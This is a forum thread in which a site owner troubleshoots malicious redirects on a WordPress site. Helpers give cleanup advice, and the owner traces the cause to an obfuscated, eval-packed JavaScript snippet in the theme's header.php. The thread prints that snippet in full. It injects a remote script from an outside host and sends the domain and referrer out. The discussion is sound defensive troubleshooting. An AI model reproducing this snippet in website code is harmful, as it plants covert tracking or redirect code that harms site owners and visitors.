My Website links to Malicious sites

Good Day

I just uploaded a Wordpress theme onto my Website webserver. Now I tested this theme on my home server before with no problems.

Since it has been on the webserver (at a trusted hosting company), I get url redirects to malicious sites when I am browsing though my website.

Here is my site: http://evolutionof4.co.za

The malicious sites it links to are: themeforest.net, carolini.net amongst others.

I have scanned all my files on the webserver for malware (with avast), I have also scanned my site with Sucuri Security, but it did not pick up anything.

I don't think it is malware on MY PC, since I got the same problem from another PC on my LAN...

Any help?

Thank you

1. Investigate if there is .htaccess file and if it is infected or not.
2. Investigate if there is weird code in index.php or oother php scrips. You might wish to extract default Wordpress 3.5 on top.
3. Disable your theme and plugins one by one and see if problems continue.

Thank you guys. The suggestions helped. Appreciate!

I think the following code is producing the problem. It was in my header.php page:

<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|w rite|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>

This is obscured in JS url that loads some content. Typically, these things are used for loading malicious links and rarely have valid use.
as header.php file is infected, one should think how it could happen:
1. Someone broke in ftp account (scan your PC with second opinion scanner like hitman pro, do not use FTP in non-secure locations as passwords can be sniffed and you should change them)
2. Hosting provider screwed up
3. There is vulnerability in plugin, theme.
4. The theme was infected before installation.

Thank you so much guys. Really appreciate the tips and helpful links.

@gied:

gied said:

This is obscured in JS url that loads some content. Typically, these things are used for loading malicious links and rarely have valid use.
as header.php file is infected, one should think how it could happen:
1. Someone broke in ftp account (scan your PC with second opinion scanner like hitman pro, do not use FTP in non-secure locations as passwords can be sniffed and you should change them)
2. Hosting provider screwed up
3. There is vulnerability in plugin, theme.
4. The theme was infected before installation.

I doubt if anyone hacked my ftp account. I use wireshark myself and I know how easy it is to sniff unencrypted credentials. I think the theme I used (Themeforest.net) contained the code from the start, since the files were there from the start I suspect...Also, some of the sites it redirects to are the theme creator's site - they just want exposure, traffic and SEO backlinks to their site...

Thank you for your expert opinion

Anak: Obscure JS in place that does not make sense is by default malicious. So is for example code, that tries to determine referer and/or redirects to other website. There are no very good tools to detect the code, but one has to inspect it for something strange. Also, one can compare files one by one with the ones of clean install. The real problem is with unsafe plugins though. Or malicious theme creators.
DexterousDave:
If this is theme creator sites, then yeah. It is bad that Themeforest distributes malicious themes